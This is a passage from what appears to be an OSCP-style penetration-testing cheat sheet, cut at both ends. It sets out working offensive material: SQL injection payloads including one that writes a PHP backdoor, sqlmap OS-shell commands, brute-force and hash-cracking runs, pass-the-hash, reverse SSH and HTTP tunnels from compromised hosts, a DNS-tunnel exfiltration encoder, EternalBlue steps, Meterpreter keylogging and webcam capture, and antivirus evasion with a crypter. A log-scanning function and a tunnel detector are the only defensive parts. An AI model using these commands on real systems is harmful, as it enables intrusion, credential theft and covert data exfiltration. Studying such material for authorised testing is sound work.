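  10.0.0.5 - - [25/Sep/2017:13:11:30 -0700] "GET /addguestbook.php?LANG=http://192.168.10.5/evil.txt HTTP/1.1" 200 300
  """


  def classify(request: str) -> list:
      """Return the sorted rule names matching one request string (path plus
      query, or a POST body). Percent-encoding is decoded first so that %2F,
      %20 and %00 are inspected as the characters the application sees."""
      decoded = unquote_plus(request).lower()
      return sorted(name for name, pattern in RULES.items() if pattern.search(decoded))


  def scan_log(lines) -> list:
      """Return (line_number, request, rules) for each log line that trips a rule."""
      hits = []
      for number, line in enumerate(lines, start=1):
          m = REQUEST_RE.search(line)
          if not m:
              continue
          rules = classify(m.group(1))
          if rules:
              hits.append((number, m.group(1), rules))
      return hits


  if __name__ == "__main__":
      for number, request, rules in scan_log(LOG.strip().splitlines()):
          print(f"line {number}: {', '.join(rules)}  <- {request}")
  ```

  A time-delay probe that reaches the database also shows up as an unusually long response time for that request, so pair this with the response-time field if your log format records it.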
  - **MSSQL Server SQL Injection Time Delay Detection:**
    Add a 30 second delay to an MSSQL Server query

    - *Original Query*

      `SELECT * FROM products WHERE name='Test';`

    - *Injection Value*

      `'; WAITFOR DELAY '00:00:30'; --`

    - *Resulting Query*

      `SELECT * FROM products WHERE name='Test'; WAITFOR DELAY '00:00:30'; --`

  - **MySQL Injection Time Delay Detection:**
    Add a 30 second delay to a MySQL query

    - *Original Query*

      `SELECT * FROM products WHERE name='Test';`

    - *Injection Value*

      `'-SLEEP(30); #`

    - *Resulting Query*

      `SELECT * FROM products WHERE name='Test'-SLEEP(30); #`

  - **PostgreSQL Injection Time Delay Detection:**
    Add a 30 second delay to a PostgreSQL query

    - *Original Query*

      `SELECT * FROM products WHERE name='Test';`

    - *Injection Value*

      `'; SELECT pg_sleep(30); --`

    - *Resulting Query*

      `SELECT * FROM products WHERE name='Test'; SELECT pg_sleep(30); --`

- Grab password hashes from a web application MySQL database called "Users" - once you have the MySQL root username and password

  ```
  mysql -u root -p -h $ip
  use Users;
  show tables;
  select * from users;
  ```

- Authentication Bypass

  ```
  name='wronguser' or 1=1;
  name='wronguser' or 1=1 LIMIT 1;
  ```

- Enumerating the Database

  `http://192.168.11.35/comment.php?id=738)'`

  Verbose error message?
  `http://$ip/comment.php?id=738 order by 1`

  `http://$ip/comment.php?id=738 union all select 1,2,3,4,5,6`

  Determine MySQL version:

  `http://$ip/comment.php?id=738 union all select 1,2,3,4,@@version,6`

  Current user being used for the database connection:

  `http://$ip/comment.php?id=738 union all select 1,2,3,4,user(),6`

  Enumerate database tables and column structures:

  `http://$ip/comment.php?id=738 union all select 1,2,3,4,table_name,6 FROM information_schema.tables`

  Target the users table in the database:

  `http://$ip/comment.php?id=738 union all select 1,2,3,4,column_name,6 FROM information_schema.columns where table_name='users'`

  Extract the name and password:

  `http://$ip/comment.php?id=738 union select 1,2,3,4,concat(name,0x3a, password),6 FROM users`

  Create a backdoor:

  `http://$ip/comment.php?id=738 union all select 1,2,3,4,"",6 into OUTFILE 'c:/xampp/htdocs/backdoor.php'`

- **SQLMap Examples**

  - Crawl the links

    `sqlmap -u http://$ip --crawl=1`

    `sqlmap -u http://meh.com --forms --batch --crawl=10 --cookie=jsessionid=54321 --level=5 --risk=3`

  - SQLMap search for databases against a suspected GET SQL injection

    `sqlmap -u http://$ip/blog/index.php?search --dbs`

  - SQLMap dump tables from database oscommerce at GET SQL injection

    `sqlmap -u http://$ip/blog/index.php?search= --dbs -D oscommerce --tables --dump`

  - SQLMap GET parameter command

    `sqlmap -u http://$ip/comment.php?id=738 --dbms=mysql --dump --threads=5`

  - SQLMap POST username parameter

    `sqlmap -u http://$ip/login.php --method=POST --data="usermail=asc@dsd.com&password=1231" -p "usermail" --risk=3 --level=5 --dbms=MySQL --dump-all`
  - SQLMap OS shell

    `sqlmap -u http://$ip/comment.php?id=738 --dbms=mysql --os-shell`

    `sqlmap -u http://$ip/login.php --method=POST --data="usermail=asc@dsd.com&password=1231" -p "usermail" --risk=3 --level=5 --dbms=MySQL --os-shell`

  - Automated sqlmap scan

    `sqlmap -u TARGET -p PARAM --data=POSTDATA --cookie=COOKIE --level=3 --current-user --current-db --passwords --file-read="/var/www/blah.php"`

  - Targeted sqlmap scan - scan a URL for union-based injection with a MySQL backend, using a random user agent, and dump the database

    `sqlmap -u "http://meh.com/meh.php?id=1" --dbms=mysql --tech=U --random-agent --dump`

  - Sqlmap check forms for injection

    `sqlmap -o -u http://$ip/index.php --forms --dbs`

    `sqlmap -o -u "http://$ip/form/" --forms`

    `sqlmap -o -u "http://$ip/vuln-form" --forms -D database-name -T users --dump`

  - Enumerate databases

    `sqlmap --dbms=mysql -u "$URL" --dbs`

  - Enumerate tables from a specific database

    `sqlmap --dbms=mysql -u "$URL" -D "$DATABASE" --tables`

  - Dump table data from a specific database and table

    `sqlmap --dbms=mysql -u "$URL" -D "$DATABASE" -T "$TABLE" --dump`

  - Specify parameter to exploit

    `sqlmap --dbms=mysql -u "http://www.example.com/param1=value1&param2=value2" --dbs -p param2`

  - Specify parameter to exploit in 'nice' URIs (exploits param1)

    `sqlmap --dbms=mysql -u "http://www.example.com/param1/value1*/param2/value2" --dbs`

  - Get OS shell

    `sqlmap --dbms=mysql -u "$URL" --os-shell`

  - Get SQL shell

    `sqlmap --dbms=mysql -u "$URL" --sql-shell`

  - SQL query

    `sqlmap --dbms=mysql -u "$URL" -D "$DATABASE" --sql-query "SELECT * FROM $TABLE;"`

  - Use Tor SOCKS5 proxy

    `sqlmap --tor --tor-type=SOCKS5 --check-tor --dbms=mysql -u "$URL" --dbs`

- **NoSQLMap Examples**
  You may encounter NoSQL instances like MongoDB in your OSCP journeys (`/cgi-bin/mongo/2.2.3/dbparse.py`). NoSQLMap can help you to automate NoSQL database enumeration.

  - NoSQLMap Installation

    ```bash
    git clone https://github.com/codingo/NoSQLMap.git
    cd NoSQLMap/
    ls
    pip install couchdb
    pip install pbkdf2
    pip install ipcalc
    python nosqlmap.py
    ```

  - Often you can create an exception dump message with MongoDB using a malformed NoSQL query such as:

    `a'; return this.a != 'BadData''; var dummy='!`

- Password Attacks
--------------------------------------------------------------------------------------------------------------

- AES Decryption
  http://aesencryption.net/

- Convert multiple webpages into a word list
  ```bash
  for x in 'index' 'about' 'post' 'contact' ; do \
    curl http://$ip/$x.html | html2markdown | tr -s ' ' '\n' >> webapp.txt ; \
  done
  ```

- Or convert HTML to a word list dictionary
  `html2dic index.html.out | sort -u > index-html.dict`

- Default Usernames and Passwords

  - CIRT
    [*http://www.cirt.net/passwords*](http://www.cirt.net/passwords)

  - Government Security - Default Logins and Passwords for Networked Devices

    - [*http://www.governmentsecurity.org/articles/DefaultLoginsandPasswordsforNetworkedDevices.php*](http://www.governmentsecurity.org/articles/DefaultLoginsandPasswordsforNetworkedDevices.php)

  - Virus.org
    [*http://www.virus.org/default-password/*](http://www.virus.org/default-password/)

  - Default Password
    [*http://www.defaultpassword.com/*](http://www.defaultpassword.com/)

- Brute Force

  - Nmap brute forcing scripts
    [*https://nmap.org/nsedoc/categories/brute.html*](https://nmap.org/nsedoc/categories/brute.html)

  - Nmap generic auto-detect brute force attack:
    `nmap --script brute -Pn $ip`

  - MySQL nmap brute force attack:
    `nmap --script=mysql-brute $ip`

- Dictionary Files

  - Word lists on Kali
    `cd /usr/share/wordlists`

- Key-space Brute Force

  - `crunch 6 6 0123456789ABCDEF -o crunch1.txt`

  - `crunch 4 4 -f /usr/share/crunch/charset.lst mixalpha`

  - `crunch 8 8 -t ,@@^^%%%`

- Pwdump and Fgdump - Security Accounts Manager (SAM)

  - `pwdump.exe` - attempts to extract password hashes

  - `fgdump.exe` - attempts to kill local antiviruses before attempting to dump the password hashes and cached credentials.

- Windows Credential Editor (WCE)

  - allows one to perform several attacks to obtain clear text passwords and hashes. Usage: `wce -w`

- Mimikatz

  - extracts plaintext passwords, hashes, PIN codes and Kerberos tickets from memory. mimikatz can also perform pass-the-hash, pass-the-ticket or build Golden tickets
    [*https://github.com/gentilkiwi/mimikatz*](https://github.com/gentilkiwi/mimikatz)
    From metasploit meterpreter (must have System level access):
    ```
    meterpreter> load mimikatz
    meterpreter> help mimikatz
    meterpreter> msv
    meterpreter> kerberos
    meterpreter> mimikatz_command -f samdump::hashes
    meterpreter> mimikatz_command -f sekurlsa::searchPasswords
    ```

- Password Profiling

  - cewl can generate a password list from a web page
    `cewl www.megacorpone.com -m 6 -w megacorp-cewl.txt`

- Password Mutating

  - John the Ripper can mutate password lists
    `nano /etc/john/john.conf`
    `john --wordlist=megacorp-cewl.txt --rules --stdout > mutated.txt`

- Medusa

  - Medusa, initiated against an htaccess protected web directory
    `medusa -h $ip -u admin -P password-file.txt -M http -m DIR:/admin -T 10`

- Ncrack

  - ncrack (from the makers of nmap) can brute force RDP
    `ncrack -vv --user offsec -P password-file.txt rdp://$ip`

- Hydra

  - Hydra brute force against SNMP

    `hydra -P password-file.txt -v $ip snmp`

  - Hydra FTP known user and rockyou password list

    `hydra -t 1 -l admin -P /usr/share/wordlists/rockyou.txt -vV $ip ftp`

  - Hydra SSH using list of users and passwords

    `hydra -v -V -u -L users.txt -P passwords.txt -t 1 $ip ssh`

  - Hydra SSH using a known password and a username list

    `hydra -v -V -u -L users.txt -p "" -t 1 $ip ssh`

  - Hydra SSH against known username on port 22

    `hydra -s 22 -l USERNAME -P big_wordlist.txt $ip ssh`

  - Hydra POP3 brute force

    `hydra -l USERNAME -P /usr/share/wordlists/nmap.lst -f $ip pop3 -V`
  - Hydra SMTP brute force

    `hydra -P /usr/share/wordlists/nmap.lst $ip smtp -V`

  - Hydra attack on an HTTP GET (401 Basic auth) login with a dictionary

    `hydra -L ./webapp.txt -P ./webapp.txt $ip http-get /admin`

  - Hydra attack on Windows Remote Desktop with rockyou

    `hydra -t 1 -V -f -l administrator -P /usr/share/wordlists/rockyou.txt rdp://$ip`

  - Hydra brute force an SMB user with rockyou:

    `hydra -t 1 -V -f -l administrator -P /usr/share/wordlists/rockyou.txt $ip smb`

  - Hydra brute force a WordPress admin login (`^USER^` and `^PASS^` are substituted per attempt; `S=Location` marks a response containing `Location`, i.e. the post-login redirect, as success. Check the form field names against the live login page before running it.)

    `hydra -l admin -P ./passwordlist.txt $ip -V http-form-post '/wp-login.php:log=^USER^&pwd=^PASS^&wp-submit=Log In&testcookie=1:S=Location'`

- Password Hash Attacks
-------------------------------------------------------------------------------------------------------------------

- Online Password Cracking
  [*https://crackstation.net/*](https://crackstation.net/)
  [*http://finder.insidepro.com/*](http://finder.insidepro.com/)

- Hashcat
  I needed to install new drivers to get GPU cracking to work on the Kali Linux VM, and I also had to use the `--force` parameter.
  `apt-get install libhwloc-dev ocl-icd-dev ocl-icd-opencl-dev`

  and

  `apt-get install pocl-opencl-icd`

  Hashcat mode numbers (`-m`) for the hash types below. For Linux hashes the `$id$` prefix of the `/etc/shadow` entry tells you which mode you need.

  Cracking Linux hashes - `/etc/shadow` file
  ```
  500  | md5crypt $1$, MD5(Unix)        | Operating-Systems
  3200 | bcrypt $2*$, Blowfish(Unix)    | Operating-Systems
  7400 | sha256crypt $5$, SHA256(Unix)  | Operating-Systems
  1800 | sha512crypt $6$, SHA512(Unix)  | Operating-Systems
  ```
  Cracking Windows hashes
  ```
  3000 | LM   | Operating-Systems
  1000 | NTLM | Operating-Systems
  ```
  Cracking common application hashes (unsalted raw digests, so these crack fastest)
  ```
  900   | MD4      | Raw Hash
  0     | MD5      | Raw Hash
  5100  | Half MD5 | Raw Hash
  100   | SHA1     | Raw Hash
  10800 | SHA-384  | Raw Hash
  1400  | SHA-256  | Raw Hash
  1700  | SHA-512  | Raw Hash
  ```

  Create a `.hash` file with all the hashes you want to crack, one per line.
  `puthasheshere.hash`:
  `$1$O3JMY.Tw$AdLnLjQ/5jXF9.MTp3gHv/`

  Hashcat example cracking Linux md5crypt (`$1$`) passwords using rockyou (`-a 0`: straight dictionary attack; `-o`: write `hash:plaintext` results to a file; `--remove`: delete hashes from the input file as they are cracked):

  `hashcat --force -m 500 -a 0 -o found1.txt --remove puthasheshere.hash /usr/share/wordlists/rockyou.txt`

  WordPress sample hash (phpass, `$P$` prefix, hashcat mode 400): `$P$B55D6LjfHDkINU5wF.v2BuuzO0/XPk/`

  WordPress clear text: `test`

  Hashcat example cracking WordPress passwords using rockyou:

  `hashcat --force -m 400 -a 0 -o found1.txt --remove wphash.hash /usr/share/wordlists/rockyou.txt`

- Sample Hashes
  [*http://openwall.info/wiki/john/sample-hashes*](http://openwall.info/wiki/john/sample-hashes)

- Identify Hashes

  `hash-identifier` (or `hashid`; both guess from length and format alone, so confirm against the application the hash came from)

- To crack Linux hashes you must first unshadow them (join `/etc/passwd` and `/etc/shadow` into the single-file format john expects; without the redirect the result goes to stdout):

  `unshadow passwd-file.txt shadow-file.txt`

  `unshadow passwd-file.txt shadow-file.txt > unshadowed.txt`

- John the Ripper - Password Hash Cracking

  - `john $ip.pwdump`

  - `john --wordlist=/usr/share/wordlists/rockyou.txt hashes`

  - `john --rules --wordlist=/usr/share/wordlists/rockyou.txt <hash-file>`

  - `john --rules --wordlist=/usr/share/wordlists/rockyou.txt unshadowed.txt`

  - JTR forced descrypt cracking with a wordlist (`--format` is needed when john's format autodetection is ambiguous)

    `john --format=descrypt --wordlist /usr/share/wordlists/rockyou.txt hash.txt`

  - JTR forced descrypt brute force cracking: with no wordlist john works through its default modes and ends in incremental (exhaustive) mode. `--show` does not crack anything; it prints what is already in the pot file, so run it as a second step:

    `john --format=descrypt hash.txt`

    `john --format=descrypt --show hash.txt`

- Passing the Hash in Windows

  - Use Metasploit to exploit one of the SMB servers in the labs. Dump the password hashes and attempt a pass-the-hash attack against another system. The value is `LM:NT`; `aad3b435b51404eeaad3b435b51404ee` as the LM half means LM hashing is disabled, and the NT half is what actually authenticates:

    `export SMBHASH=aad3b435b51404eeaad3b435b51404ee:6F403D3166024568403A94C3A6561896`

    `pth-winexe -U administrator //$ip cmd`

    The hash can also be passed inline in place of the password: `pth-winexe -U 'administrator%aad3b435b51404eeaad3b435b51404ee:6F403D3166024568403A94C3A6561896' //$ip cmd`

Networking, Pivoting and Tunneling
================================================================================================================================

- Port Forwarding - accept traffic on a given IP address and port and redirect it to a different IP address and port

  - `apt-get install rinetd`

  - `cat /etc/rinetd.conf`

  ```
  # bindaddress bindport connectaddress connectport
  w.x.y.z 53 a.b.c.d 80
  ```

- SSH Local Port Forwarding (`-L`): a port on the attacking box is forwarded through the SSH server to a host the server can reach; supports bi-directional communication channels

  - `ssh -L <local_port>:<target_host>:<target_port> <user>@<ssh_server>`

- SSH Remote Port Forwarding (`-R`): a port on the SSH server is forwarded back to a host the client can reach. Suitable for popping a remote shell on an internal non-routable network

  - `ssh -R <remote_port>:<target_host>:<target_port> <user>@<ssh_server>`

- SSH Dynamic Port Forwarding (`-D`): create a SOCKS proxy (SOCKS4/5) on our local attacking box to tunnel ALL incoming traffic to ANY host in the DMZ network on ANY port

  - `ssh -D <local_socks_port> -p <ssh_port> <user>@<ssh_server>`

- Proxychains - Perform an nmap scan within a DMZ from an external computer
  - Create a reverse SSH tunnel from the popped machine so that its SSH service (port 22) is reachable on the attacker's port 2222

    `ssh -f -N -T -R 2222:localhost:22 yourpublichost.example.com`
    `ssh -f -N -R 2222:<popped_host>:22 root@<attacker_ip>`

  - Create a dynamic, application-level port forward on 8080 through 2222 (run on the host that holds the 2222 end of the reverse tunnel; the result is a SOCKS proxy into the popped machine's network)

    `ssh -f -N -D <bind_ip>:8080 -p 2222 hax0r@<tunnel_host>`

  - Leverage the SSH SOCKS server to perform an nmap scan on the network using proxychains (set the proxy in `/etc/proxychains.conf` first; only TCP connect scans pass through SOCKS, hence `-sT`, and ICMP/ARP host discovery does not, hence `-Pn`)

    `proxychains nmap --top-ports=20 -sT -Pn $ip/24`

- HTTP Tunneling

  - Connect to the local end of an HTTP tunnel, e.g. an `htc` client listening on 8888:

    `nc -vvn $ip 8888`

- Traffic Encapsulation - Bypassing deep packet inspection

  - httptunnel (`hts` server, `htc` client) wraps an arbitrary TCP stream in HTTP requests
    On the server side (listen on 80, hand the decapsulated stream to a local service):
    `sudo hts -F <local_host>:<local_port> 80`
    On the client side (listen on a local port, connect out to the server's port 80, optionally through an HTTP proxy given with `-P`):
    `sudo htc -P <proxy_host>:<proxy_port> -F <local_port> <server_host>:80`

- Tunnel Remote Desktop (RDP) from a popped Windows machine to your network

  - Tunnel over SSH on port 22 (run on the Windows box; its RDP service appears on the attacker's port 3389)

    `plink -l root -pw pass -R 3389:127.0.0.1:3389 <attacker_ip>`

  - Port 22 blocked? Try port 80 or 443 (`-P` selects the SSH port to connect to)

    `plink -l root -pw 23847sd98sdf987sf98732 -R 3389:127.0.0.1:3389 -P 80 <attacker_ip>`

- Tunnel Remote Desktop (RDP) from a popped Windows machine using an HTTP tunnel (bypass deep packet inspection)

  - On the Windows machine, add the required firewall rules without prompting the user

    - `netsh advfirewall firewall add rule name="httptunnel_client" dir=in action=allow program="httptunnel_client.exe" enable=yes`

    - `netsh advfirewall firewall add rule name="3000" dir=in action=allow protocol=TCP localport=3000`

    - `netsh advfirewall firewall add rule name="1080" dir=in action=allow protocol=TCP localport=1080`

    - `netsh advfirewall firewall add rule name="1079" dir=in action=allow protocol=TCP localport=1079`

  - Start the HTTP tunnel client

    `httptunnel_client.exe`

  - Create the reverse tunnel over HTTP by pointing plink at the local tunnel client on port 3000 (the HTTP tunnel carries the SSH session, and the SSH session carries the RDP forward)

    `plink -l root -pw 23847sd98sdf987sf98732 -R 3389:127.0.0.1:3389 -P 3000 127.0.0.1`

- VLAN Hopping

  - ```bash
    git clone https://github.com/nccgroup/vlan-hopping.git
    cd vlan-hopping
    chmod 700 frogger.sh
    ./frogger.sh
    ```

- VPN Hacking

  - Identify VPN servers (IKE on UDP/500):
    `./udp-protocol-scanner.pl -p ike $ip`

  - Scan a range for VPN servers:
    `./udp-protocol-scanner.pl -p ike -f ip.txt`

  - Use IKEForce to enumerate or dictionary attack VPN servers:

    `pip install pyip`

    `git clone https://github.com/SpiderLabs/ikeforce.git`

    Perform IKE VPN group-name enumeration with IKEForce:

    `./ikeforce.py TARGET-IP -e -w wordlists/groupnames.dic`

    Brute force IKE VPN (XAUTH) credentials using IKEForce:

    `./ikeforce.py TARGET-IP -b -i groupid -u dan -k psk123 -w passwords.txt -s 1`

    Use ike-scan to capture the PSK hash (aggressive mode, `-A`, hands a hash derived from the PSK to anyone who presents a valid group ID):

    ```bash
    ike-scan
    ike-scan TARGET-IP
    ike-scan -A TARGET-IP
    ike-scan -A TARGET-IP --id=myid -P TARGET-IP-key
    ike-scan -M -A -n example_group -P hash-file.txt TARGET-IP
    ```
    Use psk-crack to crack the PSK hash (`-b N`: brute force up to length N; `-d`: dictionary)

    ```bash
    psk-crack hash-file.txt
    psk-crack -b 5 TARGET-IP-key
    psk-crack -b 5 --charset="0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz" 192-168-207-134-key
    psk-crack -d /path/to/dictionary-file TARGET-IP-key
    ```

- PPTP Hacking

  - Identifying PPTP: it listens on TCP 1723
    Nmap PPTP fingerprint:

    `nmap -Pn -sV -p 1723 TARGET(S)`

    PPTP dictionary attack:

    `thc-pptp-bruter -u hansolo -W -w /usr/share/wordlists/nmap.lst TARGET-IP`

- Port Forwarding/Redirection

  - PuTTY Link tunnel - SSH Tunneling

    - Forward a remote port to a local address (here the popped Windows box's SMB service, 445, appears on the attacker's port 445):

      `plink.exe -P 22 -l root -pw "1337" -R 445:127.0.0.1:445 <attacker_ip>`

- SSH Pivoting

  - SSH pivoting from one network to another (SOCKS proxy on local port 1010; traffic leaves from the pivot host):

    `ssh -D 127.0.0.1:1010 -p 22 user@<pivot_host>`

- DNS Tunneling

  - dnscat2 supports "download" and "upload" commands for getting files (data and programs) to and from the target machine.

  - Attacking machine installation:

    ```bash
    apt-get update
    apt-get -y install ruby-dev git make g++
    gem install bundler
    git clone https://github.com/iagox86/dnscat2.git
    cd dnscat2/server
    bundle install
    ```

  - Run dnscat2 (with no domain argument the server answers queries sent straight to its own IP; pass a domain you are authoritative for as the argument to relay through the real DNS hierarchy):

    ```
    ruby ./dnscat2.rb
    dnscat2> New session established: 1422
    dnscat2> session -i 1422
    ```

  - Target machine:
    [*https://downloads.skullsecurity.org/dnscat2/*](https://downloads.skullsecurity.org/dnscat2/)

    [*https://github.com/lukebaggett/dnscat2-powershell/*](https://github.com/lukebaggett/dnscat2-powershell/)

    `dnscat --host <server_ip>` (current client builds take `--dns server=<server_ip>` instead)

The Metasploit Framework
======================================================================================================================

- See the [*Metasploit Unleashed Course*](https://www.offensive-security.com/metasploit-unleashed/) in the Essentials

- Search for exploits using the Metasploit GitHub framework source code:
  [*https://github.com/rapid7/metasploit-framework*](https://github.com/rapid7/metasploit-framework)
  Translate them for use on the OSCP lab or exam.
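The DNS Tunneling entry above says dnscat2 moves files through DNS but not how bytes fit into queries. The following is an added example, not dnscat2's code or wire format (dnscat2 has its own packet header and session handling): it shows the underlying principle, packing data into base32 labels under a zone the attacker controls, respecting the 63-octet label and 253-character name limits, reassembling out-of-order queries on the far side, and, for the defender, the log signature that encoding leaves. The domain and the 4000-byte payload are constructed for the example.

```python
"""How a DNS tunnel carries data: bytes become base32 labels under a domain
the attacker controls, and the receiver reassembles the queries.  Added
illustration of the principle dnscat2 relies on; it is NOT dnscat2's wire
format, which has its own packet header and session handling."""
import base64
import math
from typing import Dict, List, Tuple

MAX_LABEL = 63       # RFC 1035: a single label is at most 63 octets
MAX_NAME = 253       # practical ceiling for a dotted name (255 on the wire)
SEQ_LABEL = "s0000"  # fixed-width sequence label, e.g. s001c


def payload_per_query(domain: str) -> int:
    """Largest raw byte count that fits in one query name under `domain`,
    after the sequence label, the separating dots and base32 expansion."""
    budget = MAX_NAME - len(domain) - len(SEQ_LABEL) - 2
    best, n = 0, 1
    while True:
        chars = math.ceil(8 * n / 5)                  # base32 without padding
        labels = math.ceil(chars / MAX_LABEL)
        if chars + (labels - 1) > budget:
            return best
        best, n = n, n + 1


def encode_query(seq: int, chunk: bytes, domain: str) -> str:
    """One chunk -> `s<seq>.<base32 labels>.<domain>` (lower case: DNS is case-insensitive)."""
    text = base64.b32encode(chunk).decode("ascii").rstrip("=").lower()
    labels = [text[i:i + MAX_LABEL] for i in range(0, len(text), MAX_LABEL)]
    name = ".".join([f"s{seq:04x}", *labels, domain])
    if len(name) > MAX_NAME:
        raise ValueError("chunk does not fit in one query name")
    return name


def decode_query(name: str, domain: str) -> Tuple[int, bytes]:
    """Inverse of encode_query; rejects names outside the tunnel zone."""
    suffix = "." + domain
    if not name.endswith(suffix):
        raise ValueError("not a query for the tunnel domain")
    parts = name[:-len(suffix)].split(".")
    seq = int(parts[0][1:], 16)
    text = "".join(parts[1:]).upper()
    text += "=" * (-len(text) % 8)                   # restore base32 padding
    return seq, base64.b32decode(text)


def upload(data: bytes, domain: str) -> List[str]:
    """Sender side: split data into numbered queries."""
    size = payload_per_query(domain)
    return [encode_query(i, data[off:off + size], domain)
            for i, off in enumerate(range(0, len(data), size))]


def reassemble(names: List[str], domain: str) -> bytes:
    """Receiver side: order by sequence number (queries may arrive out of order)."""
    chunks: Dict[int, bytes] = {}
    for name in names:
        seq, chunk = decode_query(name, domain)
        chunks[seq] = chunk
    return b"".join(chunks[seq] for seq in sorted(chunks))


def looks_like_tunnel(names: List[str], domain: str,
                      min_queries: int = 20, min_avg_len: int = 100) -> bool:
    """Defender's view: many distinct, very long names under one zone is the
    signature this encoding leaves in DNS logs (thresholds are illustrative)."""
    subs = {n[:-len(domain) - 1] for n in names if n.endswith("." + domain)}
    if len(subs) < min_queries:
        return False
    return sum(map(len, subs)) / len(subs) >= min_avg_len


# Constructed sample: a 4000-byte "file" and an attacker-controlled zone.
DOMAIN = "tunnel.example.com"
SAMPLE = b"constructed sample: " * 200

if __name__ == "__main__":
    queries = upload(SAMPLE, DOMAIN)
    print(len(queries), "queries, first:", queries[0][:60] + "...")
    assert reassemble(list(reversed(queries)), DOMAIN) == SAMPLE
    print("tunnel-like:", looks_like_tunnel(queries, DOMAIN))
```

Two things follow for the practitioner: a 4000-byte file costs about thirty queries even with the name packed to its limit, which is why DNS tunnels are slow and why the query volume per client is the first thing a resolver log review should look at; and the data rides in the question section, so an egress filter that only inspects answers never sees it.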
- Metasploit

  - Metasploit requires PostgreSQL

    `systemctl start postgresql`

  - To enable PostgreSQL on startup

    `systemctl enable postgresql`

  - On a fresh install, create the database and its msfconsole configuration with `msfdb init`; `db_status` inside msfconsole confirms the connection.

- MSF Syntax

  - Start Metasploit (`-q` suppresses the banner)

    `msfconsole`

    `msfconsole -q`

  - Show help for a command

    `show -h`

  - Show auxiliary modules

    `show auxiliary`

  - Use a module

    ```
    use auxiliary/scanner/snmp/snmp_enum
    use auxiliary/scanner/http/webdav_scanner
    use auxiliary/scanner/smb/smb_version
    use auxiliary/scanner/ftp/ftp_login
    use exploit/windows/pop3/seattlelab_pass
    ```

  - Show the basic information for a module

    `info`

  - Show the configuration parameters for a module

    `show options`

  - Set options for a module

    ```
    set RHOSTS 192.168.1.1-254
    set THREADS 10
    ```

  - Run the module

    `run`

  - Execute an exploit

    `exploit`

  - Search for a module

    `search type:auxiliary login`

- Metasploit Database Access

  - Show all hosts discovered in the MSF database

    `hosts`

  - Scan for hosts and store them in the MSF database (takes the usual nmap arguments)

    `db_nmap`

  - Search machines for specific ports in the MSF database

    `services -p 443`

  - Leverage the MSF database to populate RHOSTS with every host exposing a port (use 445 when the next module targets SMB)

    `services -p 443 --rhosts`

- Staged and Non-staged

  - Non-staged payload - sent in its entirety in one go (e.g. `windows/shell_reverse_tcp`); needs enough buffer space for the whole payload

  - Staged payload - sent in two parts: a small stager (e.g. `windows/shell/reverse_tcp`) connects back and fetches the rest. Used when there is not enough buffer space for the full payload, or when the smaller first stage helps bypass antivirus

- MS17-010 - EternalBlue

  - You may find some boxes that are vulnerable to MS17-010 (a.k.a. EternalBlue). Although not officially part of the intended course, this exploit can be leveraged to gain SYSTEM-level access to a Windows box. I have never had much luck using the built-in Metasploit EternalBlue module. I found that the ElevenPaths version works much more reliably. Here are the instructions to install it, taken from the following YouTube video: [*https://www.youtube.com/watch?v=4OHLor9VaRI*](https://www.youtube.com/watch?v=4OHLor9VaRI)

    1. First step is to configure Kali to work with 32-bit wine

       ```bash
       dpkg --add-architecture i386 && apt-get update && apt-get install wine32
       rm -r ~/.wine
       wine cmd.exe
       exit
       ```

    2. Download the exploit repository `https://github.com/ElevenPaths/Eternalblue-Doublepulsar-Metasploit`

    3. Move the exploit to `/usr/share/metasploit-framework/modules/exploits/windows/smb` or `~/.msf4/modules/exploits/windows/smb` (run `reload_all` in msfconsole afterwards so the new module is picked up)

    4. Start the Metasploit console

  - I found that using spoolsv.exe as the PROCESSINJECT yielded results on OSCP boxes.
    ```
    use exploit/windows/smb/eternalblue_doublepulsar
    msf exploit(eternalblue_doublepulsar) > set RHOST 10.10.10.10
    RHOST => 10.10.10.10
    msf exploit(eternalblue_doublepulsar) > set PROCESSINJECT spoolsv.exe
    PROCESSINJECT => spoolsv.exe
    msf exploit(eternalblue_doublepulsar) > run
    ```

- Experimenting with Meterpreter

  - Get system information from the Meterpreter shell

    `sysinfo`

  - Get the user ID from the Meterpreter shell

    `getuid`

  - Search for a file

    `search -f *pass*.txt`

  - Upload a file

    `upload /usr/share/windows-binaries/nc.exe c:\\Users\\Offsec`

  - Download a file

    `download c:\\Windows\\system32\\calc.exe /tmp/calc.exe`

  - Invoke a command shell from the Meterpreter shell

    `shell`

  - Exit the Meterpreter shell

    `exit`

- Metasploit Exploit Multi Handler

  - multi/handler to accept an incoming reverse_https meterpreter payload (LHOST and LPORT must match the values the payload was generated with)

    ```
    use exploit/multi/handler
    set PAYLOAD windows/meterpreter/reverse_https
    set LHOST $ip
    set LPORT 443
    exploit
    [*] Started HTTPS reverse handler on https://$ip:443/
    ```

- Building Your Own MSF Module

  - Copy an existing module of the same type into your local module tree and edit it (modules under `~/.msf4/modules` are loaded alongside the system ones):
    ```bash
    mkdir -p ~/.msf4/modules/exploits/linux/misc
    cd ~/.msf4/modules/exploits/linux/misc
    cp /usr/share/metasploit-framework/modules/exploits/linux/misc/gld_postfix.rb ./crossfire.rb
    nano crossfire.rb
    ```

- Post Exploitation with Metasploit (available options depend on the OS and Meterpreter capabilities)

  - `download`        Download a file or directory
    `upload`          Upload a file or directory
    `portfwd`         Forward a local port to a remote service
    `route`           View and modify the routing table
    `keyscan_start`   Start capturing keystrokes
    `keyscan_stop`    Stop capturing keystrokes
    `screenshot`      Grab a screenshot of the interactive desktop
    `record_mic`      Record audio from the default microphone for X seconds
    `webcam_snap`     Take a snapshot from the specified webcam
    `getsystem`       Attempt to elevate your privilege to that of local SYSTEM
    `hashdump`        Dump the contents of the SAM database (`user:RID:LM:NT:::` lines; needs SYSTEM)

- Meterpreter Post Exploitation Features

  - Create a Meterpreter background session (returns to the `msf` prompt with the session kept alive; `sessions -i <id>` resumes it)

    `background`

Bypassing Antivirus Software
===========================================================================================================================

- Crypting Known Malware with Software Protectors

  - One such open source crypter is called Hyperion (it encrypts the PE and prepends a stub that recovers the key by brute force at run time; the `libgcc`/`libstdc++` DLL paths below depend on the installed mingw-w64 version, so adjust `5.3-win32` to match)

    ```bash
    cp /usr/share/windows-binaries/Hyperion-1.0.zip .
    unzip Hyperion-1.0.zip
    cd Hyperion-1.0/
    i686-w64-mingw32-g++ Src/Crypter/*.cpp -o hyperion.exe
    cp -p /usr/lib/gcc/i686-w64-mingw32/5.3-win32/libgcc_s_sjlj-1.dll .
    cp -p /usr/lib/gcc/i686-w64-mingw32/5.3-win32/libstdc++-6.dll .
